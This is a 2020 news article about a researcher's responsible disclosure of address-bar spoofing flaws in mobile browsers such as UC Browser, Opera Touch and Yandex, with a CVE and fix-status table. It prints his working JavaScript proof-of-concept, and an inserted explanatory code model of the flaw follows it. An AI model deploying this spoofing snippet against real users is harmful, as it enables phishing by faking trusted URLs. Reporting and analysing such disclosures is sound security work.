Pakistani white-hat hacker finds vulnerabilities in multiple mobile browsers

By TechJuice on
October 20, 2020

Renowned Pakistani white-hat hacker and information security researcher, Rafay Baloch, has found vulnerabilities in multiple browsers.

Rafay has published a detailed paper on his website describing the vulnerabilities and the browsers currently affected by them. Most of us trust a website if the URL shown in the address bar looks right. Rafay's demonstration shows that this trust can be abused with a technique called address bar spoofing.

Address bar spoofing shows the URL of a site you trust while you are actually on a different site altogether. Say you want to go to bing.com, so you click a link that should take you to Bing. The address bar at the top reads bing.com, but the page you are looking at is not Bing.

He demonstrated this with the following test case (if you don't read code, you can skip to the output image):

<p class="test"><input class="btn btn-success btn-lg" type="button" value="Run test case"
onclick="win = window.open(&quot;https://www.facebook.com:8080&quot;,&quot;WIN&quot;);
window.open(&quot;https://www.bing.com&quot;, &quot;WIN&quot;);
win.window.stop();
win.document.write('This is not Facebook');
win.document.close();
" /></p>

[Image: output of the test case above (vulnerabilitiesRAFAY.jpg)]

The above output is from Opera Touch on iOS, a widely used mobile browser. The same code was tested in multiple browsers on different operating systems. Rafay disclosed the issues to the browser vendors as early as September; according to him, only Apple and Opera have responded so far.
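To make the security-relevant point explicit, here is an added model, not code from the article or from Rafay Baloch's test case, of the address-bar state a browser keeps for a named window. It assumes (an assumption, not something the article states) that the spoof works when the browser UI keeps showing the URL of a navigation that window.stop() has already aborted; all names are made up for the example.

```javascript
// Added example, not code from the article or from Rafay Baloch's test case.
// Toy model of the address bar for a named window: "committed" is the URL of
// the document actually rendered, "pending" a navigation that has started but
// has not produced a document yet. Assumption modelled here: the spoof works
// when the UI keeps showing the pending URL after win.window.stop() aborted
// that navigation, so the bar reads bing.com while the content is whatever the
// opener wrote into the still-committed blank document.
class NamedWindowModel {
  constructor({ revertOnAbort }) {
    this.revertOnAbort = revertOnAbort; // false reproduces the flawed UI behaviour
    this.committed = "about:blank";     // window.open() starts with a blank document
    this.pending = null;
    this.displayed = "about:blank";
    this.body = "";
  }
  // window.open(url, "WIN"): opening the same name again re-navigates that window.
  open(url) {
    this.pending = url;
    this.displayed = url; // the pending URL is shown while the load is in flight
  }
  // win.window.stop(): the load is aborted before any document commits.
  stop() {
    this.pending = null;
    if (this.revertOnAbort) this.displayed = this.committed; // correct: fall back to the real document
  }
  // win.document.write(): the blank document inherits the opener's origin, so the
  // opener may write into it; this changes neither committed nor pending.
  write(text) {
    this.body += text;
  }
  // Invariant a browser UI must hold: with no navigation in flight, the bar
  // shows the committed document's URL.
  isSpoofed() {
    return this.pending === null && this.displayed !== this.committed;
  }
}

// Replays the sequence of the test case on the page against one model.
function replayTestCase(model) {
  model.open("https://www.facebook.com:8080");
  model.open("https://www.bing.com");
  model.stop();
  model.write("This is not Facebook");
  return { displayed: model.displayed, committed: model.committed, body: model.body, spoofed: model.isSpoofed() };
}

const flawed = replayTestCase(new NamedWindowModel({ revertOnAbort: false }));
const fixed = replayTestCase(new NamedWindowModel({ revertOnAbort: true }));
console.log(flawed, fixed);
```

In the flawed model the bar still reads https://www.bing.com over the opener-written text; in the fixed model it reverts to about:blank, which is what a browser's address-bar logic has to guarantee once a navigation is cancelled.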

The affected browsers are listed below:

CVE           | Vendor            | Browser        | Version    | Platform | Fixed?
------------- | ----------------- | -------------- | ---------- | -------- | ---------------------------------------------------------------------------------
CVE-2020-7363 | UCWeb             | UC Browser     | 13.0.8     | Android  | No reply from vendor
CVE-2020-7364 | UCWeb             | UC Browser     | 13.0.8     | Android  | No reply from vendor
CVE TBD-Opera | Opera             | Opera Mini     | 51.0.2254  | Android  | Fix expected from vendor Nov. 11, 2020
CVE TBD-Opera | Opera             | Opera Touch    | 2.4.4      | iOS      | Fix expected from vendor Nov. 11, 2020
CVE TBD-Opera | Opera             | Opera Touch    | 2.4.4      | iOS      | Fix expected from vendor Nov. 11, 2020
CVE TBD-Opera | Opera             | Opera Touch    | 2.4.4      | iOS      | Fix expected from vendor Nov. 11, 2020
CVE-2020-7369 | Yandex            | Yandex Browser | 20.8       | Android  | Automated reply, followed up Oct. 19, 2020. Fix published Oct. 1 in version 20.8.4.
CVE-2020-7370 | Danyil Vasilenko  | Bolt Browser   | 1.4        | iOS      | Support email bounced, alerted Apple product security
CVE-2020-7371 | Raise IT Solutions| RITS Browser   | 3.3.9      | Android  | Fix expected Oct. 19, 2020
CVE-2020-9987 | Apple             | Apple iOS      | 13.6       | iOS      | Fix released Sept. 16, 2020

 

Since the COVID-19 pandemic started, multiple browsers have been found vulnerable to phishing attacks as well. This is worrying, as a vendor like UCWeb has not even responded to the disclosure, and UC Browser has more than 500 million users.

Image Source: Computerworld
